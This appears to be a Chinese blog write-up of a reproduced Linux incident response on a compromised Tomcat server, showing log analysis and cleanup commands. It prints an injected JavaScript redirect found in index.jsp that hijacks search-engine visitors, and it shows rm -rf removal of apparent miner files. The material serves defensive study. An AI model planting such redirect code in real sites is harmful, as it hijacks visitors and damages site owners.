find / -name "index.jsp"
cat /opt/tomcat9/webapps/ROOT/index.jsp
<script type="text/javascript">
var search=document.referrer;
if(search.indexOf("baidu")>0||search.indexOf("so")>0||search.indexOf("soso")>0||search.indexOf("google")> 0||search.indexOf("youdao")>0||search.indexOf("sogou")>0)
self.location="https://www.XXXXXXXX.com";
</script>
cd /opt/tomcat9/logs/
cat localhost_access_log.2021-02-24.txt
例如:
192.168.184.128 - tomcat [24/Feb/2021:02:17:30 -0500] "GET /manager/html HTTP/1.1" 200 19775
而与之对应的结构是:”%h %l %u %t “%r” %s %b”
%h 为远程主机名(若无法获取主机名亦可为远程主机IP)对应192.168.248.1
%l 为远端登录名(由identd而来),除非IdentityCheck设为"On",否则将得到一个"-"
%u 为远程用户名(根据验证信息而来),若不存在得到一个"-"
%t 为时间,用普通日志时间格式(标准英语格式) 对应[14/Aug/2017:19:39:20 -0700]
" 为双引号"的实体编码
%r 为请求头第一行(包括HTTP方法和请求的URI),对应GET /cms/jeeadmin/jeecms/index.do HTTP/1.1
%s 为HTTP响应状态码
%b 为发送信息的字节数,不包括HTTP头,如果字节数为0的话,显示为-
cd /opt/tomcat9/conf
cat tomcat-users.xml
cat /opt/tomcat9/logs/cat localhost_access_log.20* | grep tomcat
cat localhost_access_log.20* | awk '{print $1}'|sort -r -n |uniq -c
cat /opt/tomcat9/logs/localhost_access_log.20* |grep 192.168.184.146 | grep 200
cat /opt/tomcat9/logs/localhost_access_log.20* |grep 192.168.184.1 | grep 200
top
lsattr root
chattr -i root
chattr -i update.sh
rm -rf update.sh
chattr -i networkservice
rm -rf networkservice
chattr -i sysupdate
rm -rf sysupdate
chattr -i sysguard
rm -rf sysguard
chattr -i config.json
rm -rf config.json
利用本账号所发文章
进行直接或间接的非法行为
均由操作者本人负全责
犀利猪安全及文章对应作者
不为此承担任何责任
文章来自互联网或原创
如有侵权可联系我方进行删除
并诚挚的跟您说声抱歉
原文始发于微信公众号(犀利猪安全):记第二次Linux应急响应 | 复现还原版
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论